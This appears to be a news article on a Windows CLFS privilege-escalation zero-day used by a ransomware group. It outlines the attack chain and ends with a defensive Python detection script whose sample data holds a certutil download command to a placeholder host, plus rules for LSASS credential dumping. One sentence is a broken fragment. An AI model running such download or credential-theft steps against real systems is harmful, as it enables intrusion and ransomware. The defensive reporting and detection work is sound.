Microsoft: Windows CLFS Vulnerability Could Lead to ‘Widespread Deployment and Detonation of Ransomware’

Microsoft has detected a zero-day vulnerability in the Windows Common Log File System (CLFS) being exploited in the wild to deploy ransomware. Targeted industries include IT, real estate, finance, software, and retail, with affected companies based in the US, Spain, Venezuela, and Saudi Arabia.

The vulnerability, tracked as CVE-2025-29824 and rated “Important,” is present in the CLFS kernel driver. It allows an attacker who already has standard user access to a system to escalate their privileges locally. The individual can then use that privileged access, according to a blog post by the Microsoft Threat Intelligence Center.

The CLFS driver is a key Windows component used to write transaction logs, and its misuse could let an attacker gain SYSTEM privileges. From there, they could steal data or install backdoors. Microsoft regularly uncovers privilege escalation flaws in CLFS, the last one having been patched in December.

In the instances of CVE-2025-29824 exploitation observed by Microsoft, the so-called “PipeMagic” malware was deployed before the attackers exploited the vulnerability to escalate privileges. PipeMagic gives attackers remote control over a system and lets them run commands or install more malicious tools.


Who is behind the exploitation?

Microsoft has identified Storm-2460 as the threat actor exploiting this vulnerability with PipeMagic and ransomware, linking it to the RansomEXX group.

Once known as Defray777, the attackers came onto the scene in 2018. Hardware manufacturer Gigabyte. The group has been linked to Russian nationals.

The US’s cyber agency has added the vulnerability, which carries a CVSS score of 7.8, to its known exploited vulnerabilities list, meaning that federal civilian agencies are required to apply the patches by April 29.

Windows 10, Windows 11, and Windows Server are vulnerable

On April 8, security updates were released to patch the vulnerability in Windows 11, Windows Server 2022, and Windows Server 2019. Patches for Windows 10 were not yet available; Redmond says they will be released “as soon as possible” and that “customers will be notified via a revision to this CVE information” once they are.

Devices running Windows 11 version 24H2 or newer cannot be exploited this way, even though the vulnerability is present. Access to the required system information is restricted to users holding the SeDebugPrivilege permission, a level of access typically unavailable to standard users.

How exploitation works

Microsoft observed threat actors using the certutil command-line utility to download a malicious MSBuild file onto the victim’s system.

This file, which carried an encrypted PipeMagic payload, was hosted on a once-legitimate third-party website that had been compromised to serve the threat actor’s malware. One domain PipeMagic communicated with was habbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb[.]com, which has since been disabled.

Once PipeMagic was decrypted and run in memory, the attackers used a dllhost.exe process to leak kernel addresses, or memory locations, to user mode. They then overwrote the process’s token, which defines what the process is allowed to do, with the value 0xfffffff, granting it full privileges and allowing the attackers to inject into SYSTEM processes.

Next, they injected a payload into the SYSTEM winlogon.exe process, which in turn injected the Sysinternals procdump.exe tool into another dllhost.exe process and executed it. This enabled the threat actor to dump the memory of LSASS, the process that holds user credentials.

Following credential theft, ransomware was deployed. Microsoft observed files being encrypted, a random extension being appended, and a ransom note named !_READ_ME_REXX2_! being dropped.
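The chain above (certutil download, injection from winlogon.exe into dllhost.exe, LSASS memory access, ransom note drop) maps onto a few simple endpoint detections. The following is an added example, not code from Microsoft or TechRepublic: it runs toy rules over constructed Sysmon-style events; the event field names, the LSASS allowlist and the URL are all assumptions made for the example.

```python
"""Toy detections for the stages described in the article, run over
constructed Sysmon-style events (all sample telemetry below is made up)."""
import re

# Constructed sample telemetry, loosely modelled on Sysmon event types.
EVENTS = [
    {"type": "ProcessCreate", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://example.invalid/build.msbuild"},
    {"type": "CreateRemoteThread", "source": r"C:\Windows\System32\winlogon.exe",
     "target": r"C:\Windows\System32\dllhost.exe"},
    {"type": "ProcessAccess", "source": r"C:\Windows\System32\dllhost.exe",
     "target": r"C:\Windows\System32\lsass.exe"},
    {"type": "FileCreate", "image": r"C:\Users\Public\update.exe",
     "path": r"C:\Users\alice\Documents\!_READ_ME_REXX2_!"},
    {"type": "ProcessAccess", "source": r"C:\Windows\System32\csrss.exe",
     "target": r"C:\Windows\System32\lsass.exe"},  # benign, expected access
]

# Processes that legitimately open handles to LSASS (assumed; tune per environment).
LSASS_ALLOWLIST = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def detect(event):
    """Return a finding string for one event, or None if no rule matched."""
    t = event["type"]
    if t == "ProcessCreate" and basename(event["image"]) == "certutil.exe" \
            and re.search(r"-urlcache\b.*https?://", event["cmdline"], re.I):
        return "certutil used to download a remote file"
    if t == "CreateRemoteThread" and basename(event["source"]) == "winlogon.exe":
        return "winlogon.exe injected a thread into " + basename(event["target"])
    if t == "ProcessAccess" and basename(event["target"]) == "lsass.exe" \
            and basename(event["source"]) not in LSASS_ALLOWLIST:
        return "unexpected LSASS access from " + basename(event["source"])
    if t == "FileCreate" and basename(event["path"]).upper() == "!_READ_ME_REXX2_!":
        return "RansomEXX ransom note written by " + basename(event["image"])
    return None

def scan(events):
    """Apply detect() to every event and keep only the findings."""
    return [f for f in (detect(e) for e in events) if f]

if __name__ == "__main__":
    for finding in scan(EVENTS):
        print(finding)
```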
